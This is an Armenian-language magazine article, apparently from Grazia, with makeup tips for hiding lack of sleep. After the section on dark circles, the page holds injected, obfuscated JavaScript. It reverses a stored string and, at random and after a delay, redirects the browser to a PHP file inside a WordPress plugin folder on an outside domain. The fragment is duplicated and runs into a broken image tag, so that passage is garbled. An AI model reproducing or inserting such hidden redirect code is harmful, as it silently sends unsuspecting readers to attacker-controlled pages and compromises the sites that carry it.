Դիմահարդարման մեթոդներ, որոնք կքողարկեն քնի պակասը

Նույնիսկ եթե դուք չեք քնել, այս պարզ հնարքները կօգնեն ձեզ ունենալ այնպիսի թարմ տեսք՝ ասես նոր եք վերադարձել հանգստից։

Սկսեք աչքերից

Վերին կոպի և աչքի արտաքին անկյունի ծայրերում կիրառեք այնպիսի ստվերաներկ, որը մի քանի տոնով ավելի մուգ կլինի քան մաշկի բնական գույնը: Կոպի մնացած հատվածի համար կիրառեք մաշկի գույնից մի փոքր ավելի բաց, իսկ աչքի ներքին անկյունում փայլուն ստվերաներկեր: Մի մոռացեք նաև սևաներկի (տուշ) օգտագործման մասին:

Քողարկեք կապտուկները

Եթե ձեր աչքերի շրջաններում սևացած հատվածներ կամ կապտուկներ կան՝ օգտագործեք դեղնավոն կորեկտոր։ Այն ամբողջովին քողարկում է սևությունը։ Տարածեք այն բարակ շերտերով, որպեսզի դիմակի տպավորություն չթողնի։

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor-CC-Colour-Correct-Yellow-Under-Eye-Circles-Review-and-Swatches-1024×1024.jpg” alt=”” width=”1024″ height=”1024″ />

Մեծացրեք աչքերը

Պետք է բնական (մարմնագույնին մոտ) մատիտով ընդգծել աչքերի և թարթիչների միջև գտնվող գիծը։ Այսպես դուք կմեծացնեք ձեր աչքերը և կքողարկեք կոպերի կարմրությունը։

«Primer» օգտագործեք

Մաշկը փայլեցնող «primer»-ը կհարթեցնի ձեր մաշկը և թարմ տեսք կպարգևի ձեզ

Ընդգծեք շրթունքները

Աչքերի հոգնածությունից ուշադրությունը շեղելու համար՝ ընդգծեք ձեր շուրթերը վառ գույներով։ Հնարքը շատ պարզ է, բայց արդյունավետ։

Հրաժարվեք տոնային քսուքից

Տոնային քսուքի խիտ ծածկույթը միայն ընդգծում է դեմքի հոգնածությունը։ Ավելի թարմ և բնական տեսք ունենալու համար ընդամենը անհրաժեշտ է մի քանի կաթիլ տոնային քսուքին ավելացնել խոնավեցնող կամ փափկեցնող քսուքը և այդպես կրառել։

Թարթիչներ ավելացրեք

Նույնիսկ ամենաայտուցված աչքերը թարմ տեսք կունենան, եթե վերևում մի քանի թարթիչ կցեք։

Ընդգծեք հոնքերը

Հոնքերն ընդգծելու համար մատիտի փոխարեն օգտագործեք ստվերաներկ։ Ստվերաներկներն ավելի արտահայտիչ են դարձնում հոնքերը։

Աղբյուր՝ Grazia